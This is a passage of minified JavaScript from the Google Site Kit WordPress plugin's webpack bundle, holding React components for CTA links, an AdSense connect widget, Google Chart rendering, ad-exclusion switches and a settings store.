T="BUTTON",S="BUTTON_DISABLED",k="EXTERNAL_LINK",j="LINK",v="ROUTER_LINK",b=(0,c.forwardRef)((e,t)=>{const{"aria-label":i,secondary:a=!1,arrow:s=!1,back:n=!1,caps:r=!1,children:c,className:g="",danger:m=!1,disabled:p=!1,external:h=!1,hideExternalIndicator:y=!1,href:b="",inverse:_=!1,noFlex:x=!1,onClick:C,small:D=!1,standalone:E=!1,linkButton:w=!1,to:Z,leadingIcon:R,trailingIcon:L,...G}=e;const z=b||Z||!C?Z?v:h?k:j:p?S:T;const O=z===T||z===S?"button":z===v?l.N_:"a",P=function(){let e;return z===k&&(e=(0,d._x)("(opens in a new tab)","screen reader text","google-site-kit")),z===S&&(e=(0,d._x)("(disabled)","screen reader text","google-site-kit")),e?i?`${i} ${e}`:"string"==typeof c?`${c} ${e}`:void 0:i}();let B=R,U=L;return n&&(B=(0,f.jsx)(A,{width:14,height:14})),h&&!y&&(U=(0,f.jsx)(M.A,{width:14,height:14})),s&&!_&&(U=(0,f.jsx)(u,{width:14,height:14})),s&&_&&(U=(0,f.jsx)(I,{width:14,height:14})),(0,f.jsxs)(O,{"aria-label":P,className:o()("googlesitekit-cta-link",g,{"googlesitekit-cta-link--secondary":a,"googlesitekit-cta-link--inverse":_,"googlesitekit-cta-link--small":D,"googlesitekit-cta-link--caps":r,"googlesitekit-cta-link--danger":m,"googlesitekit-cta-link--disabled":p,"googlesitekit-cta-link--standalone":E,"googlesitekit-cta-link--link-button":w,"googlesitekit-cta-link--no-flex":!!x}),disabled:p,href:z!==j&&z!==k||p?void 0:b,onClick:C,rel:z===k?"noopener noreferrer":void 0,ref:t,target:z===k?"_blank":void 0,to:Z,...G,children:[!!B&&(0,f.jsx)(N.A,{marginRight:5,children:B}),(0,f.jsx)("span",{className:"googlesitekit-cta-link__contents",children:c}),!!U&&(0,f.jsx)(N.A,{marginLeft:5,children:U})]})});b.propTypes={arrow:r().bool,back:r().bool,caps:r().bool,children:r().node,className:r().string,danger:r().bool,disabled:r().bool,external:r().bool,hideExternalIndicator:r().bool,href:r().string,inverse:r().bool,leadingIcon:r().node,linkButton:r().bool,noFlex:r().bool,onClick:r().func,small:r().bool,standalone:r().bool,to:r().string,trailingIcon:r().node};const _=b},39368:(e,t,i)=>{Object.prototype.hasOwnProperty.call(i.g,"google")||(i.g.google={})},41671:(e,t,i)=>{"use strict";i.d(t,{A:()=>l});var a=i(62688),s=i.n(a),o=i(82871),n=i(38432),r=i(97015);const LearnMoreLink=({className:e,external:t=!0,href:i,label:a=(0,o.__)("Learn more","google-site-kit"),onClick:s=()=>{}})=>i?r.createElement(n.A,{href:i,className:e,onClick:s,external:t},a):null;LearnMoreLink.propTypes={href:s().string.isRequired,className:s().string,label:s().string,external:s().bool,onClick:s().func};const l=LearnMoreLink},42340:(e,t,i)=>{"use strict";i.d(t,{A:()=>ModuleSettingsWarning});var a=i(50539),s=i(88273),o=i(97345),n=i(23955),r=i(25797),l=i(62540);function ModuleSettingsWarning({slug:e}){const t=(0,a.useSelect)(t=>t(s.i)?.getCheckRequirementsError(e));return t?o.od===t.code?(0,l.jsx)(n.A,{moduleSlug:e}):(0,l.jsx)(r.A,{className:"googlesitekit-notice--small",type:r.A.TYPES.WARNING,description:t.message,hideIcon:!0}):null}},42343:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),a||(a=s.createElement("path",{fill:"currentColor",d:"m5.825 22 2.325-7.6L2 10h7.6L12 2l2.4 8H22l-6.15 4.4 2.325 7.6L12 17.3z"})))},42616:(e,t,i)=>{"use strict";i.d(t,{A:()=>AdSenseConnectCTA});var a=i(63560),s=i(62688),o=i.n(s),n=i(82871),r=i(63696),l=i(13606),c=i(50539),d=i(49383),g=i(35952),u=i(58718),m=i(10740),p=i(29785),I=i(88273),h=i(70301),y=i(49993),A=i(6109),M=i(4452),N=i.n(M),f=i(4751),T=i(91013),S=i(62540);const k=(0,r.lazy)(()=>i.e(201).then(i.bind(i,37201))),j=(0,r.lazy)(()=>i.e(640).then(i.bind(i,96640))),v=(0,r.lazy)(()=>i.e(379).then(i.bind(i,87379)));function LazyContentSVG({stage:e}){const t={0:(0,S.jsx)(k,{}),1:(0,S.jsx)(j,{}),2:(0,S.jsx)(v,{})};return t[e]?(0,S.jsx)(T.A,{errorMessage:(0,n.__)("Failed to load graphic","google-site-kit"),children:t[e]}):null}function ContentSVG({stage:e}){return(0,S.jsx)(r.Suspense,{fallback:(0,S.jsx)(f.A,{width:"100%",height:"100%"}),children:(0,S.jsx)(LazyContentSVG,{stage:e})})}ContentSVG.propTypes={stage:s.PropTypes.oneOf([0,1,2]).isRequired};var b=i(93431),_=i(33052),x=i(83880);const C=(0,r.forwardRef)(({stage:e,mode:t,onAnimationEnd:i},a)=>{const s=[{title:(0,n.__)("Earn money from your site","google-site-kit"),description:(0,n.__)("Focus on writing good content and let AdSense help you make it profitable","google-site-kit")},{title:(0,n.__)("Save time with automated ads","google-site-kit"),description:(0,n.__)("Auto ads automatically place and optimize your ads for you so you don't have to spend time doing it yourself","google-site-kit")},{title:(0,n.__)("You’re in control","google-site-kit"),description:(0,n.__)("Block ads you don't like, customize where ads appear, and choose which types fit your site best","google-site-kit")}],o={smSize:4,mdSize:4,lgSize:6};return(0,S.jsxs)(r.Fragment,{children:[(0,S.jsx)(m.fI,{children:(0,S.jsxs)(m.fh,{size:12,children:[(0,S.jsx)("p",{className:"googlesitekit-setup__intro-title",children:(0,n.__)("Connect Service","google-site-kit")}),(0,S.jsxs)("div",{className:"googlesitekit-setup-module",children:[(0,S.jsx)("div",{className:"googlesitekit-setup-module__logo",children:(0,S.jsx)(b.A,{width:"33",height:"33"})}),(0,S.jsx)(_.A,{as:"h3",className:"googlesitekit-setup-module__title",size:"small",type:"headline",children:(0,n._x)("AdSense","Service name","google-site-kit")})]})]})}),(0,S.jsxs)(m.fI,{ref:a,children:[(0,S.jsxs)(m.fh,{...o,smOrder:2,mdOrder:1,className:"googlesitekit-setup-module--adsense__stage-captions",children:[(0,S.jsx)("ul",{className:"googlesitekit-setup-module--adsense__stage-caption-container",children:s.map(({title:i,description:a},s)=>(0,S.jsxs)("li",{className:N()("googlesitekit-setup-module--adsense__stage-caption",{[`googlesitekit-setup-module--adsense__stage-caption--current--${t}`]:e===s}),children:[(0,S.jsx)("div",{className:"googlesitekit-setup-module--adsense__stage-caption-indicator"}),(0,S.jsxs)("div",{children:[(0,S.jsx)(_.A,{as:"h4",size:"large",type:"title",children:i}),(0,S.jsx)(x.A,{children:a})]})]},s))}),(0,S.jsx)("ul",{className:"googlesitekit-setup-module--adsense__stage-indicator",children:s.map((i,a)=>(0,S.jsx)("li",{className:N()({[`googlesitekit-setup-module--adsense__stage-indicator--current--${t}`]:e===a})},a))})]}),(0,S.jsx)(m.fh,{...o,smOrder:1,mdOrder:2,className:"googlesitekit-setup-module--adsense__stage-images",children:(0,S.jsx)("div",{className:"googlesitekit-setup-module--adsense__stage-image-container",children:s.map((a,s)=>(0,S.jsx)("div",{className:N()("googlesitekit-setup-module--adsense__stage-image",{[`googlesitekit-setup-module--adsense__stage-image--current--${t}`]:e===s}),onAnimationEnd:e===s?i:void 0,children:(0,S.jsx)(ContentSVG,{stage:s})},s))})})]})]})});C.propTypes={stage:o().oneOf([0,1,2]),mode:o().oneOf(["static","enter","leave"]),onAnimationEnd:o().func};const D=C,E=0,w=2;function ContentAutoUpdate({hasBeenInView:e}){const[{stage:t,mode:i},a]=(0,r.useState)({stage:0,mode:"static"});return(0,r.useEffect)(()=>{if(!e)return()=>{};const t=setTimeout(()=>{a({stage:0,mode:"leave"})},7e3);return()=>{clearTimeout(t)}},[e]),(0,S.jsx)(D,{stage:t,mode:i,onAnimationEnd:function(){"enter"===i?a({stage:t,mode:"leave"}):"leave"===i&&a({stage:t===w?E:t+1,mode:"enter"})}})}ContentAutoUpdate.propTypes={hasBeenInView:o().bool.isRequired};var Z=i(55103),R=i(62659);function AdSenseConnectCTA({onDismissModule:e}){const{navigateTo:t}=(0,c.useDispatch)(h.M),{activateModule:i}=(0,c.useDispatch)(I.i),{setInternalServerError:s}=(0,c.useDispatch)(p.O4),o=(0,R.A)(),M=(0,r.useRef)(),[N,f]=(0,r.useState)(!1),T=(0,a.A)(M,{threshold:.25}),k=!!T?.intersectionRatio;(0,r.useEffect)(()=>{k&&!N&&((0,A.sx)(`${o}_adsense-cta-widget`,"widget_view"),f(!0))},[k,o,N]);const j=(0,c.useSelect)(e=>e(g.wl).getAdminReauthURL()),v=(0,c.useSelect)(e=>e(I.i).isModuleActive(u.Py)),b=(0,c.useSelect)(e=>e(I.i).isModuleConnected(u.Py)),_=(0,c.useSelect)(e=>!!e(I.i).isFetchingSetModuleActivation(u.Py,!0)||!!j&&e(h.M).isNavigatingTo(j)),C=(0,r.useCallback)(async()=>{const{response:e,error:a}=await i(u.Py);return a?(s({id:"setup-module-error",description:a.message}),null):(await(0,A.sx)(`${o}_adsense-cta-widget`,"activate_module",u.Py),await(0,y.SO)("module_setup",u.Py,{ttl:300}),t(e.moduleReauthURL),null)},[i,t,s,o]),D=(0,r.useCallback)(()=>t(j),[j,t]),E=(0,r.useCallback)(()=>{(0,A.sx)(`${o}_adsense-cta-widget`,"dismiss_widget"),e()},[e,o]),w={smSize:4,mdSize:4,lgSize:6};return(0,S.jsx)("section",{ref:M,className:"googlesitekit-setup__wrapper googlesitekit-setup__wrapper--adsense-connect",children:(0,S.jsxs)(m.xA,{children:[(0,S.jsx)(ContentAutoUpdate,{hasBeenInView:N}),(0,S.jsxs)(m.fI,{children:[(0,S.jsx)(m.fh,{...w,children:(0,S.jsxs)("div",{className:"googlesitekit-setup-module__action",children:[!v&&(0,S.jsx)(d.SpinnerButton,{onClick:C,isSaving:_,disabled:_,children:(0,n.__)("Connect now","google-site-kit")}),v&&!b&&(0,S.jsx)(d.SpinnerButton,{onClick:D,isSaving:_,children:(0,n.__)("Complete setup","google-site-kit")}),(0,S.jsx)(d.Button,{onClick:E,tertiary:!0,children:(0,n.__)("Maybe later","google-site-kit")})]})}),(0,S.jsx)(m.fh,{...w,className:"googlesitekit-setup-module__footer-text",children:(0,S.jsx)(x.A,{children:(0,l.A)((0,n.__)("AdSense accounts are <a>subject to review and approval</a> by the Google AdSense team","google-site-kit"),{a:(0,S.jsx)(Z.A,{path:"/adsense/answer/9724",external:!0,hideExternalIndicator:!0})})})})]})]})})}AdSenseConnectCTA.propTypes={onDismissModule:o().func.isRequired}},42960:(e,t,i)=>{"use strict";i.d(t,{M:()=>n});var a=i(32091),s=i.n(a),o=i(6109);function n(e){const{startDate:t,endDate:i,compareStartDate:a,compareEndDate:n}=e;s()((0,o.Qr)(t),"A valid startDate is required."),s()((0,o.Qr)(i),"A valid endDate is required.");const r={"_u.date00":t.replace(/-/g,""),"_u.date01":i.replace(/-/g,"")};return(a||n)&&(s()((0,o.Qr)(a)&&(0,o.Qr)(n),"Valid compareStartDate and compareEndDate values are required."),r["_u.date10"]=a.replace(/-/g,""),r["_u.date11"]=n.replace(/-/g,"")),r}},44148:(e,t,i)=>{"use strict";i.d(t,{A:()=>h});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(63696),l=i(13606),c=i(82871),d=i(38432),g=i(6109),u=i(4124),m=i(62659),p=i(92449);var I=i(97015);function SourceLink({name:e="",href:t="",className:i="",external:a=!1}){const s=(0,m.A)(),o=(0,u.A)(),h=(0,r.useContext)(p.Ay),y=(0,r.useCallback)(()=>{h.slug&&s&&(0,g.sx)(`${s}_widget`,"click_source_link",h.slug)},[s,h]);return o?null:I.createElement("div",{className:n()("googlesitekit-source-link",i)},(0,l.A)((0,c.sprintf)(/* translators: %s: source link */ /* translators: %s: source link */ (0,c.__)("Source: %s","google-site-kit"),`<a>${e}</a>`),{a:I.createElement(d.A,{key:"link",href:t,external:a,onClick:y})}))}SourceLink.propTypes={name:s().string,href:s().string,className:s().string,external:s().bool};const h=SourceLink},44161:(e,t,i)=>{"use strict";i.d(t,{A:()=>GoogleChart});i(39368);var a=i(4452),s=i.n(a),o=i(32091),n=i.n(o),r=i(62688),l=i.n(r),c=i(89054),d=i(15844),g=i(52684),u=i(63696),m=i(4751),p=i(97345),I=i(13113),h=i(50539),y=i(38021),A=i.n(y),M=i(82871),N=i(12317),f=i(6730),T=i(19826),S=i(6109),k=i(83880),j=i(62540);class GoogleChartErrorHandler extends u.Component{constructor(e){super(e),this.state={error:null,info:null},this.onErrorClick=this.onErrorClick.bind(this)}componentDidCatch(e,t){i.g.console.error("Google Charts error:",e,t),this.setState({error:e,info:t}),(0,S.sx)("google_chart_error",`handle_${this.context||"unknown"}_error`,`${e?.message}\n${t?.componentStack}`.slice(0,500))}onErrorClick(){const{error:e,info:t}=this.state;A()(`\`${e?.message}\n${t?.componentStack}\``)}render(){const{children:e}=this.props,{error:t,info:i}=this.state;return t?(0,j.jsx)("div",{className:"googlesitekit-googlechart-error-handler",children:(0,j.jsx)(N.A,{description:(0,j.jsxs)(u.Fragment,{children:[(0,j.jsx)(k.A,{children:(0,M.__)("An error prevented this Google chart from being displayed properly. Report the exact contents of the error on the support forum to find out what caused it.","google-site-kit")}),(0,j.jsx)(f.A,{message:t.message,componentStack:i.componentStack})]}),onErrorClick:this.onErrorClick,onClick:this.onErrorClick,title:(0,M.__)("Error in Google Chart","google-site-kit"),error:!0})}):e}}GoogleChartErrorHandler.contextType=T.Ay,GoogleChartErrorHandler.propTypes={children:l().node.isRequired};const v=GoogleChartErrorHandler;var b=i(12417),_=i(51135),x=i(49383),C=i(62659),D=i(7076);function DateMarker({id:e,text:t}){const i=`${(0,C.A)()}_ga4-data-collection-line`;(0,u.useEffect)(()=>{(0,S.sx)(i,"chart_line_view")},[i]);const a=(0,u.useCallback)(()=>{(0,S.sx)(i,"chart_tooltip_view")},[i]),s=(0,D.d)(a,5e3,{leading:!0,trailing:!1});return(0,j.jsxs)(u.Fragment,{children:[(0,j.jsx)("div",{id:`googlesitekit-chart__date-marker-line--${e}`,className:"googlesitekit-chart__date-marker-line"}),t&&(0,j.jsx)("div",{id:`googlesitekit-chart__date-marker-tooltip--${e}`,className:"googlesitekit-chart__date-marker-tooltip",children:(0,j.jsx)(x.Tooltip,{title:t,onOpen:s,children:(0,j.jsx)("span",{children:(0,j.jsx)(b.A,{fill:"currentColor",icon:_.A,size:18})})})})]})}var E=i(7972),w=i(86582),Z=i(28975),R=i(97513);function GoogleChart(e){const{chartEvents:t,chartType:a,children:o,className:r,data:l,dateMarkers:y,getChartWrapper:A,height:M,loaded:N,loadingHeight:f,loadingWidth:T,onMouseOver:k,onMouseOut:b,onReady:_,onSelect:x,selectedStats:D,width:L,options:G,gatheringData:z,...O}=e,P=(0,g.A)(GoogleChart),B=(0,R.dv)(),{startDate:U,endDate:W}=(0,h.useSelect)(e=>e(p.oR).getDateRangeDates({offsetDays:0})),H=(0,C.A)(),V=(0,h.useSelect)(e=>e(E.n).getValue("googleChartsCollisionError")),[Y,F]=(0,u.useState)(!1),{setValue:Q}=(0,h.useDispatch)(E.n),J=(0,Z.gZ)(l,D),X="PieChart"===a?"circular":"square",q=(0,Z._8)(f,M,T,L),K=(0,j.jsx)("div",{className:"googlesitekit-chart-loading",children:(0,j.jsx)(m.A,{className:"googlesitekit-chart-loading__wrapper",shape:X,...q})}),$=(0,u.useRef)(),ee=(0,u.useRef)();(0,d.A)(()=>{void 0===V&&((0,w.A)(H)&&i.g?.google?.charts&&(i.g.google.charts=void 0),!(0,w.A)(H)&&i.g?.google?.charts?Q("googleChartsCollisionError",!0):Q("googleChartsCollisionError",!1))}),(0,u.useEffect)(()=>()=>{if(ee.current&&$.current){const{events:e}=ee.current.visualization;e.removeAllListeners($.current.getChart()),e.removeAllListeners($.current)}},[]),(0,u.useLayoutEffect)(()=>{k&&ee.current?.visualization.events.addListener($.current.getChart(),"onmouseover",e=>{k(e,{chartWrapper:$.current,google:ee.current})}),b&&ee.current?.visualization.events.addListener($.current.getChart(),"onmouseout",e=>{b(e,{chartWrapper:$.current,google:ee.current})})},[k,b]);const te=y.filter(e=>{return!!((t=new Date(e.date))&&U&&W)&&!(t.getTime()<(0,S.XH)(U).getTime()||t.getTime()>(0,S.XH)(W).getTime());var t});if(V)return null;if(!N)return(0,j.jsx)("div",{className:s()("googlesitekit-chart","googlesitekit-chart-loading__forced",r),children:K});const ie=(0,Z.$J)([...t||[],{eventName:"ready",callback:function(){if(!$.current)return;if(!te.length)return;const e=$.current.getChart(),t=e?.getChartLayoutInterface(),i=t?.getChartAreaBoundingBox(),a=$.current.getDataTable();if(!t||!i||!a)return;te.forEach((e,a)=>{const s=new Date(e.date),o=document.getElementById(`googlesitekit-chart__date-marker-line--${P}-${a}`);n()(o,`#googlesitekit-chart__date-marker-line--${P}-${a} is missing from the DOM, but required to render date markers.`);const r=Math.floor(t.getXLocation((0,S.XH)((0,S.sq)(s))));if(Object.assign(o.style,{left:r-1+"px",top:`${Math.floor(i.top)}px`,height:`${Math.floor(i.height)}px`,opacity:1}),e.text){const e=document.getElementById(`googlesitekit-chart__date-marker-tooltip--${P}-${a}`);n()(e,`#googlesitekit-chart__date-marker-tooltip--${P}-${a} is missing from the DOM, but required to render date marker tooltips.`),Object.assign(e.style,{left:r-9+"px",top:Math.floor(i.top)-18+"px",opacity:1})}});const s=document.querySelector(`#googlesitekit-chart-${P} svg:first-of-type > g:first-of-type > g > g > text`)?.parentElement.parentElement.parentElement;!!s&&document.querySelectorAll(`#googlesitekit-chart-${P} svg:first-of-type > g`).length>=3&&(s.style.transform="translateY(-10px)")}}],_,x),ae=(0,Z.Hp)(G,{gatheringData:z,chartType:a,startDate:U,endDate:W,breakpoint:B});return(0,j.jsx)(v,{children:(0,j.jsxs)("div",{className:s()("googlesitekit-chart",`googlesitekit-chart--${a}`,r),id:`googlesitekit-chart-${P}`,tabIndex:-1,children:[(0,j.jsx)(c.t,{className:"googlesitekit-chart__inner",chartEvents:ie,chartLanguage:(0,S.JK)(),chartType:a,chartVersion:"49",data:J,loader:K,height:M,getChartWrapper:(e,t)=>{Y||F(!0),e!==$.current&&(ee.current?.visualization.events.removeAllListeners($.current?.getChart()),ee.current?.visualization.events.removeAllListeners($.current)),$.current=e,ee.current=t,A&&A(e,t)},width:L,options:ae,...O}),z&&Y&&(0,j.jsx)(I.A,{style:I.v.OVERLAY}),!!te.length&&te.map((e,t)=>(0,j.jsx)(DateMarker,{id:`${P}-${t}`,text:e.text},`googlesitekit-chart__date-marker--${P}-${t}`)),o]})})}GoogleChart.propTypes={className:l().string,children:l().node,chartEvents:l().arrayOf(l().shape({eventName:l().string,callback:l().func})),chartType:l().oneOf(["LineChart","PieChart"]).isRequired,data:l().array,dateMarkers:l().arrayOf(l().shape({date:l().string.isRequired,text:l().string})),getChartWrapper:l().func,height:l().string,loaded:l().bool,loadingHeight:l().string,loadingWidth:l().string,onMouseOut:l().func,onMouseOver:l().func,onReady:l().func,onSelect:l().func,selectedStats:l().arrayOf(l().number),width:l().string,options:l().object,gatheringData:l().bool},GoogleChart.defaultProps={...c.t.defaultProps,dateMarkers:[],gatheringData:!1,loaded:!0}},44436:(e,t,i)=>{"use strict";i.d(t,{A:()=>g});var a,s=i(82871),o=i(88933),n=i(63696);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},r.apply(null,arguments)}const l=e=>n.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 80 21"},e),a||(a=n.createElement("path",{fill:"#5F6368",d:"M62.09 1.664h3.038v.1L58.34 9.593l7.241 10.224v.1H62.7L56.755 11.4 53.95 14.64v5.278h-2.351V1.664h2.35v9.415h.1zM69.985 3.117c0 .454-.167.853-.488 1.175-.322.322-.71.488-1.176.488-.455 0-.854-.166-1.175-.488a1.6 1.6 0 0 1-.488-1.175c0-.466.166-.854.488-1.176s.71-.488 1.175-.488c.455 0 .854.166 1.176.488.332.333.487.72.487 1.176m-.477 4.313v12.498h-2.351V7.43zM77.016 20.128c-1.02 0-1.864-.31-2.54-.943q-1.014-.948-1.031-2.628V9.57h-2.196V7.43h2.196V3.603h2.35V7.43h3.061v2.14h-3.06v6.222c0 .831.166 1.397.488 1.696.321.3.687.444 1.097.444.189 0 .366-.022.555-.067.188-.044.344-.1.499-.166l.743 2.096c-.632.222-1.342.333-2.162.333M2.673 18.952C1.375 18.009.488 16.678 0 14.97l2.883-1.176c.289 1.076.799 1.94 1.542 2.628.732.677 1.619 1.02 2.65 1.02.965 0 1.774-.244 2.45-.742.677-.5 1.01-1.187 1.01-2.052 0-.798-.3-1.453-.887-1.974q-.883-.781-3.094-1.564l-1.22-.432Q3.371 9.997 2.04 8.716C1.153 7.862.71 6.742.71 5.346c0-.966.266-1.853.787-2.673S2.75 1.209 3.693.72C4.624.244 5.678 0 6.864 0c1.708 0 3.072.41 4.081 1.242 1.02.832 1.697 1.752 2.04 2.795L10.236 5.2c-.2-.621-.576-1.164-1.142-1.63-.565-.477-1.286-.71-2.173-.71s-1.641.222-2.251.676-.91 1.032-.91 1.742c0 .676.278 1.22.82 1.663.544.432 1.398.854 2.563 1.253l1.22.41c1.674.577 2.96 1.342 3.88 2.274.921.931 1.376 2.184 1.376 3.748 0 1.275-.322 2.34-.976 3.193a6 6 0 0 1-2.495 1.919 8 8 0 0 1-3.116.621c-1.62 0-3.072-.466-4.358-1.408M15.969 3.449a1.95 1.95 0 0 1-.588-1.43c0-.566.2-1.043.588-1.431A1.95 1.95 0 0 1 17.399 0c.566 0 1.043.2 1.43.588.389.388.588.865.588 1.43 0 .566-.2 1.043-.587 1.43a1.95 1.95 0 0 1-1.43.589c-.566-.012-1.043-.2-1.431-.588m-.067 2.595h2.994v13.883h-2.994zM25.406 19.85c-.544-.2-.987-.466-1.331-.788-.776-.776-1.176-1.84-1.176-3.182V8.683h-2.428v-2.64h2.428V2.13h2.994v3.926h3.372v2.639h-3.372v6.531c0 .743.145 1.276.433 1.575.277.366.743.543 1.42.543.31 0 .576-.044.82-.122q.35-.116.765-.399v2.917c-.599.277-1.32.41-2.173.41a5 5 0 0 1-1.753-.3M33.623 19.407a6.63 6.63 0 0 1-2.529-2.628c-.61-1.12-.909-2.373-.909-3.77 0-1.332.3-2.551.887-3.693.588-1.132 1.409-2.04 2.462-2.706s2.251-1.01 3.593-1.01c1.397 0 2.606.311 3.637.921a6.1 6.1 0 0 1 2.34 2.528c.532 1.076.799 2.274.799 3.627 0 .255-.023.576-.078.953H33.179c.111 1.287.566 2.285 1.375 2.983a4.16 4.16 0 0 0 2.817 1.043c.854 0 1.597-.189 2.218-.588a4.27 4.27 0 0 0 1.508-1.597l2.528 1.198q-.981 1.713-2.561 2.694c-1.054.655-2.318.976-3.782.976q-2.046.033-3.66-.931m7.23-8.051a3.3 3.3 0 0 0-.466-1.453c-.277-.477-.687-.887-1.242-1.208-.554-.322-1.23-.488-2.03-.488-.964 0-1.773.288-2.439.853-.665.566-1.12 1.342-1.375 2.296z"})));var c=i(55989),d=i(62540);const g=function Logo(){return(0,d.jsxs)("div",{className:"googlesitekit-logo","aria-hidden":"true",children:[(0,d.jsx)(o.A,{className:"googlesitekit-logo__logo-g",height:"34",width:"32"}),(0,d.jsx)(l,{className:"googlesitekit-logo__logo-sitekit",height:"26",width:"99"}),(0,d.jsx)(c.A,{children:(0,s.__)("Site Kit by Google Logo","google-site-kit")})]})}},45257:(e,t,i)=>{"use strict";i.d(t,{A:()=>LoadingWrapper});var a=i(62688),s=i.n(a),o=i(4751),n=i(62540);function LoadingWrapper({loading:e,children:t,...i}){return e?(0,n.jsx)(o.A,{...i}):t}LoadingWrapper.propTypes={loading:s().bool,children:s().node,...o.A.propTypes}},45454:(e,t,i)=>{"use strict";i.d(t,{Ay:()=>AutoAdExclusionSwitches,BN:()=>u,nk:()=>d,ru:()=>g});var a=i(63696),s=i(82871),o=i(50539),n=i(49383),r=i(83880),l=i(35952),c=i(62540);const d="loggedinUsers",g="contentCreators",u={[d]:(0,s.__)("All logged-in users","google-site-kit"),[g]:(0,s.__)("Users who can write posts","google-site-kit")};function AutoAdExclusionSwitches(){const e=(0,o.useSelect)(e=>e(l.wl).getAutoAdsDisabled()),{setAutoAdsDisabled:t}=(0,o.useDispatch)(l.wl);let i;i=e&&e.includes(d)?(0,s.__)("Ads will not be displayed for all logged-in users","google-site-kit"):e&&e.includes(g)?(0,s.__)("Ads will not be displayed for users that can write posts","google-site-kit"):(0,s.__)("Ads will be displayed for all users","google-site-kit");const m=(0,a.useCallback)((i,a)=>{const s=a?e.concat(i):e.filter(e=>e!==i);t(s)},[e,t]),p=(0,a.useCallback)(e=>{const{checked:t}=e.target;m(g,t)},[m]),I=(0,a.useCallback)(e=>{const{checked:t}=e.target;m(d,t)},[m]);return Array.isArray(e)?(0,c.jsxs)("fieldset",{className:"googlesitekit-analytics-auto-ads-disabled",children:[(0,c.jsx)("legend",{className:"googlesitekit-setup-module__text",children:(0,s.__)("Exclude from Ads","google-site-kit")}),(0,c.jsxs)("div",{className:"googlesitekit-settings-module__inline-items",children:[(0,c.jsx)("div",{className:"googlesitekit-settings-module__inline-item",children:(0,c.jsx)(n.Switch,{label:u[d],checked:e.includes(d),onClick:I,hideLabel:!1})}),!e.includes(d)&&(0,c.jsx)("div",{className:"googlesitekit-settings-module__inline-item",children:(0,c.jsx)(n.Switch,{label:u[g],checked:e.includes(g),onClick:p,hideLabel:!1})})]}),(0,c.jsx)(r.A,{children:i})]}):null}},46763:(e,t,i)=>{"use strict";i.d(t,{B7:()=>T,FK:()=>f,JG:()=>M,VM:()=>S,Wq:()=>I,hk:()=>N,mV:()=>p});var a=i(32091),s=i.n(a),o=i(17243),n=i(54419),r=i(50539),l=i(8084),c=i(74426),d=i(35812),g=i(73866);const{clearError:u,receiveError:m}=g.o1,p="cannot submit changes while submitting changes",I="cannot submit changes if settings have not changed",h="SET_SETTINGS",y="ROLLBACK_SETTINGS",A="ROLLBACK_SETTING";function M(e,t,i,{ownedSettingsSlugs:a,storeName:g,settingSlugs:p=[],initialSettings:I,validateHaveSettingsChanged:M=S()}={}){s()(e,"type is required."),s()(t,"identifier is required."),s()(i,"datapoint is required.");const N=g||`${e}/${t}`,f={ownedSettingsSlugs:a,settings:I,savedSettings:void 0},T=(0,d.U)({baseName:"getSettings",controlCallback:()=>(0,n.get)(e,t,i,{},{useCache:!1}),reducerCallback:(0,r.createReducer)((e,t)=>{e.savedSettings={...t},e.settings={...t,...e.settings||{}}})}),k=(0,d.U)({baseName:"saveSettings",controlCallback:a=>{const{values:s}=a;return(0,n.set)(e,t,i,s)},reducerCallback:(0,r.createReducer)((e,t)=>{e.savedSettings={...t},e.settings={...t}}),argsToParams:e=>({values:e}),validateParams:({values:e}={})=>{s()((0,o.isPlainObject)(e),"values is required.")}}),j={},v={setSettings:e=>(s()((0,o.isPlainObject)(e),"values is required."),{payload:{values:e},type:h}),rollbackSettings:()=>({payload:{},type:y}),rollbackSetting:e=>(s()(e,"setting is required."),{payload:{setting:e},type:A}),*saveSettings(){const e=yield r.commonActions.getRegistry();yield u("saveSettings",[]);const t=e.select(N).getSettings(),{response:i,error:a}=yield k.actions.fetchSaveSettings(t);return a&&(yield m(a,"saveSettings",[])),{response:i,error:a}}},b=(0,r.createReducer)((e,{type:t,payload:i})=>{switch(t){case h:{const{values:t}=i;e.settings={...e.settings||{},...t};break}case y:e.settings=e.savedSettings;break;case A:{const{setting:t}=i;e.savedSettings[t]&&(e.settings={...e.settings||{},[t]:e.savedSettings[t]});break}default:void 0!==j[t]&&j[t](e,{type:t,payload:i})}}),_={*getSettings(){(yield r.commonActions.getRegistry()).select(N).getSettings()||(yield T.actions.fetchGetSettings())}},{safeSelector:x,dangerousSelector:C}=(0,l.RF)(M),D={haveSettingsChanged:x,__dangerousHaveSettingsChanged:C,getSettings:e=>e.settings,hasSettingChanged(e,t){s()(t,"setting is required.");const{settings:i,savedSettings:a}=e;return!(!i||!a)&&!(0,o.isEqual)(i[t],a[t])},isDoingSaveSettings:e=>Object.values(e.isFetchingSaveSettings).some(Boolean),getOwnedSettingsSlugs:e=>e.ownedSettingsSlugs,haveOwnedSettingsChanged:(0,r.createRegistrySelector)(e=>()=>{const t=e(N).getOwnedSettingsSlugs();return e(N).haveSettingsChanged(t)})};p.forEach(e=>{const t=(0,c.m2)(e),i=(0,c.sP)(e);v[`set${t}`]=e=>(s()(void 0!==e,`value is required for calls to set${t}().`),{payload:{value:e},type:`SET_${i}`}),j[`SET_${i}`]=(t,{payload:i})=>{const{value:a}=i;t.settings={...t.settings||{},[e]:a}},D[`get${t}`]=(0,r.createRegistrySelector)(t=>()=>(t(N).getSettings()||{})[e])});return{...(0,r.combineStores)(r.commonStore,T,k,{initialState:f,actions:v,controls:{},reducer:b,resolvers:_,selectors:D}),STORE_NAME:N}}function N(e,t){return async({select:i,dispatch:a})=>{if(i(t).haveSettingsChanged()){const{error:e}=await a(t).saveSettings();if(e)return{error:e}}return await(0,n.invalidateCache)("modules",e),{}}}function f(e){return({select:t,dispatch:i})=>t(e).haveSettingsChanged()?i(e).rollbackSettings():{}}function T(e){return t=>{const 